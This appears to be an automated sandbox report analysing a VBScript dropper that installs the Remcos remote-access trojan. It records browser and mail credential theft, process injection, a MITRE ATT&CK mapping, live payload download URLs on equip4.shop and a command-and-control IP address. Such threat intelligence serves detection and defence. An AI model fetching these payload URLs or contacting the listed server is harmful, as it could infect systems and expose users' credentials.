              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword12_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword12_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword12_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7064, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MBJump to behavior
              Source: Yara matchFile source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts11
              Windows Management Instrumentation
              321
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              3
              Obfuscated Files or Information
              1
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              1
              Registry Run Keys / Startup Folder
              412
              Process Injection
              1
              Software Packing
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares2
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts22
              Command and Scripting Interpreter
              Login Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              NTDS28
              System Information Discovery
              Distributed Component Object ModelInput Capture1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts3
              PowerShell
              Network Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets141
              Security Software Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture112
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530551 Sample: MV STARSHIP AQUILA_pdf.vbs Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 32 geoplugin.net 2->32 34 equip4.shop 2->34 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 10 other signatures 2->48 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 54 Early bird code injection technique detected 8->54 56 Writes to foreign memory regions 8->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 8->58 66 2 other signatures 8->66 13 msiexec.exe 3 13 8->13         started        17 conhost.exe 8->17         started        60 VBScript performs obfuscated calls to suspicious functions 11->60 62 Suspicious powershell command line found 11->62 64 Wscript starts Powershell (via cmd or directly) 11->64 68 3 other signatures 11->68 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 36 154.216.18.214, 2404, 49738, 49739 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->36 38 geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands 13->38 70 Detected Remcos RAT 13->70 72 Tries to steal Mail credentials (via file registry) 13->72 74 Maps a DLL or memory area into another process 13->74 21 msiexec.exe 2 13->21         started        24 msiexec.exe 1 13->24         started        26 msiexec.exe 1 13->26         started        30 2 other processes 13->30 40 equip4.shop 104.21.56.207, 49730, 49737, 80 CLOUDFLARENETUS United States 19->40 76 Found suspicious powershell code related to unpacking or dynamic code loading 19->76 78 Powershell creates an autostart link 19->78 28 conhost.exe 19->28         started        signatures8 process9 signatures10 50 Tries to harvest and steal browser information (history, passwords, etc) 21->50 52 Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes) 28->52

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              MV STARSHIP AQUILA_pdf.vbs5%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              geoplugin.net0%VirustotalBrowse
              equip4.shop5%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr0%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              https://maps.windows.com/windows-app-web-link0%VirustotalBrowse
              http://www.nirsoft.net0%VirustotalBrowse
              http://geoplugin.net/json.gpO0%VirustotalBrowse
              http://www.nirsoft.net/0%VirustotalBrowse
              https://www.office.com/0%VirustotalBrowse
              http://geoplugin.net/json.gpl0%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=wsb0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalseunknown
              equip4.shop
              104.21.56.207
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.bintrue
                unknown
                http://equip4.shop/FvMVdpFg/Atols.rartrue
                  unknown
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  unknown
                  154.216.18.214true
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.imvu.comrmsiexec.exe, 00000008.00000002.3028207567.000000001FC40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://geoplugin.net/json.gpjb5W7msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Wbhv9E46.tmp.10.drfalse
                        unknown
                        http://crl.microsoftBppowershell.exe, 00000001.00000002.1876984080.00000112E45A5000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://crl.microsoftpowershell.exe, 00000003.00000002.2045907923.0000000006FDD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.imvu.comtamsiexec.exe, 0000000D.00000003.2170309707.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170273131.00000000007BD000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhv9E46.tmp.10.drfalse
                              unknown
                              https://aefd.nelreports.net/api/report?cat=bingthbhv9E46.tmp.10.drfalseunknown
                              https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhv9E46.tmp.10.drfalse
                                unknown
                                https://contoso.com/Licensepowershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.bin$msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmptrue
                                  unknown
                                  http://www.nirsoft.netmsiexec.exe, 0000000A.00000002.2193776072.00000000000F3000.00000004.00000010.00020000.00000000.sdmpfalseunknown
                                  https://aefd.nelreports.net/api/report?cat=bingaotakbhv9E46.tmp.10.drfalseunknown
                                  https://deff.nelreports.net/api/report?cat=msnbhv9E46.tmp.10.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Frbhv9E46.tmp.10.drfalse
                                    unknown
                                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhv9E46.tmp.10.drfalse
                                      unknown
                                      https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Frbhv9E46.tmp.10.drfalseunknown
                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000008.00000002.3028207567.000000001FC40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        unknown
                                        https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhv9E46.tmp.10.drfalse
                                          unknown
                                          https://www.google.commsiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                          https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv9E46.tmp.10.drfalse
                                            unknown
                                            http://equip4.shop/FvMVdpFg/Atols.rarPpowershell.exe, 00000001.00000002.1877272550.00000112E6117000.00000004.00000800.00020000.00000000.sdmptrue
                                              unknown
                                              https://maps.windows.com/windows-app-web-linkbhv9E46.tmp.10.drfalseunknown
                                              https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv9E46.tmp.10.drfalse
                                                unknown
                                                http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.binLmsiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmptrue
                                                  unknown
                                                  http://geoplugin.net/json.gpOmsiexec.exe, 00000008.00000003.2153435021.0000000000698000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2153308251.0000000000697000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2166795122.0000000000688000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2163785144.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2166598432.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2165888413.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2162793689.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2164797616.0000000000699000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                  https://contoso.com/powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv9E46.tmp.10.drfalse
                                                    unknown
                                                    https://login.yahoo.com/config/loginmsiexec.exefalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.nirsoft.net/msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1877272550.00000112E5EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2027928945.0000000004611000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv9E46.tmp.10.drfalse
                                                      unknown
                                                      https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv9E46.tmp.10.drfalse
                                                        unknown
                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv9E46.tmp.10.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.office.com/bhv9E46.tmp.10.drfalseunknown
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv9E46.tmp.10.drfalse
                                                          unknown
                                                          https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv9E46.tmp.10.drfalse
                                                            unknown
                                                            https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv9E46.tmp.10.drfalse
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://geoplugin.net/json.gplmsiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                              https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv9E46.tmp.10.drfalse
                                                                unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                https://go.micropowershell.exe, 00000001.00000002.1877272550.00000112E6A52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv9E46.tmp.10.drfalse
                                                                  unknown
                                                                  http://www.imvu.commsiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170309707.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170273131.00000000007BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://aefd.nelreports.net/api/report?cat=wsbbhv9E46.tmp.10.drfalseunknown
                                                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv9E46.tmp.10.drfalse
                                                                    unknown
                                                                    http://equip4.shop/FvMVdpFg/Atols.rarXR1lpowershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv9E46.tmp.10.drfalse
                                                                          unknown
                                                                          http://geoplugin.net/json.gpl0bmsiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://aefd.nelreports.net/api/report?cat=bingaotbhv9E46.tmp.10.drfalse
                                                                              unknown
                                                                              https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv9E46.tmp.10.drfalse
                                                                                unknown
                                                                                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv9E46.tmp.10.drfalse
                                                                                  unknown
                                                                                  https://aka.ms/pscore6lBdqpowershell.exe, 00000003.00000002.2027928945.0000000004611000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv9E46.tmp.10.drfalse
                                                                                      unknown
                                                                                      https://aefd.nelreports.net/api/report?cat=bingrmsbhv9E46.tmp.10.drfalse
                                                                                        unknown
                                                                                        https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv9E46.tmp.10.drfalse
                                                                                          unknown
                                                                                          https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                            unknown
                                                                                            https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv9E46.tmp.10.drfalse
                                                                                              unknown
                                                                                              http://equip4.shoppowershell.exe, 00000001.00000002.1877272550.00000112E6117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1877272550.00000112E7B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1877272550.00000112E77F8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                unknown
                                                                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1877272550.00000112E5EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv9E46.tmp.10.drfalse
                                                                                                  unknown
                                                                                                  https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv9E46.tmp.10.drfalse
                                                                                                    unknown
                                                                                                    https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv9E46.tmp.10.drfalse
                                                                                                      unknown
                                                                                                      http://www.ebuddy.commsiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      154.216.18.214
                                                                                                      unknownSeychelles
                                                                                                      135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                                                                      178.237.33.50
                                                                                                      geoplugin.netNetherlands
                                                                                                      8455ATOM86-ASATOM86NLfalse
                                                                                                      104.21.56.207
                                                                                                      equip4.shopUnited States
                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1530551
                                                                                                      Start date and time:2024-10-10 08:56:23 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 7m 57s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:15
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:MV STARSHIP AQUILA_pdf.vbs
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@18/10@2/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 66.7%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 97%
                                                                                                      • Number of executed functions: 164
                                                                                                      • Number of non-executed functions: 283
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .vbs
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 2060 because it is empty
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 4948 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      TimeTypeDescription
                                                                                                      02:57:24API Interceptor86x Sleep call for process: powershell.exe modified
                                                                                                      02:58:36API Interceptor461142x Sleep call for process: msiexec.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      154.216.18.214September Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        178.237.33.501728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        6yfpZrVWQI.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        xQOrkxePXD.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        C0B9Ema9el.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        SKM_C364e24092511300346565787689900142344656767788755634232343456768953334466870.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        104.21.56.207September Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • equip4.shop/GjeNAJul/seFOmzylfvsQOjUaZxF213.bin
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        equip4.shopSeptember Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 104.21.56.207
                                                                                                        geoplugin.net1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        6yfpZrVWQI.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        xQOrkxePXD.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        C0B9Ema9el.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        SKM_C364e24092511300346565787689900142344656767788755634232343456768953334466870.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUSRechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                                                        • 172.66.0.227
                                                                                                        4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                                                        • 172.67.74.152
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        https://aboriginal-investment-proposal.squarespace.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.3
                                                                                                        http://docs.google.com/drawings/u/0/d/1upFXiljnDLvdOIt1Aoe3r44ZCVNRtnjt0CV6fZcs1no/previewGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 188.114.96.3
                                                                                                        RRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        • 188.114.97.3
